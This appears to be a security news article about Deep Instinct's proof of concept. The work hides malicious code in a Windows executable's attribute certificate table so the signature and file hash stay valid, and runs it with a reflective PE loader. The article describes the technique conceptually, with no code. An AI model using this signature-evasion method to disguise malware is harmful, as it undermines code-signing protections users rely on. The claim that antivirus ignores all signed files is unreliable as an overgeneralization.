When users double-click an executable and launch it, Windows does three things. It first reads the file’s PE headers, validates the certificate, and validates the file hash.

After reverse-engineering this entire process, the Deep Instinct team discovered Windows does not include three fields from the PE headers in the file hash validation process and that modifying these three fields does not break the certificate’s validity.

The fields are the file’s Checksum, its attribute certificate table, and the IMAGE_DIRECTORY_ENTRY_SECURITY field from the DataDirectory section.

In proof-of-concept code, the research team inserted malicious code inside the attribute certificate table, successfully leaving the digital certificate and the file hash intact.

This method is so efficient that malware coders do not even need to hide their malicious code. The reason is antivirus and security software automatically ignores any digitally signed file.

By leaving the file hash intact, this technique also bypasses any secondary checks security software might perform besides checking for a digital certificate.

Researchers also bypassed the problem of not being able to launch into execution malicious code from a file’s attribute certificate table, which resides in the file’s digital certificate.

Despite their success, the Deep Instinct team said their Reflective PE Loader does not support 64-bit architectures, at least for now.

For malware authors this approach provides a way to hide malicious code in plain sight, right in the digital certificate, the file section that authenticates a file’s origin and safeguards users from malware.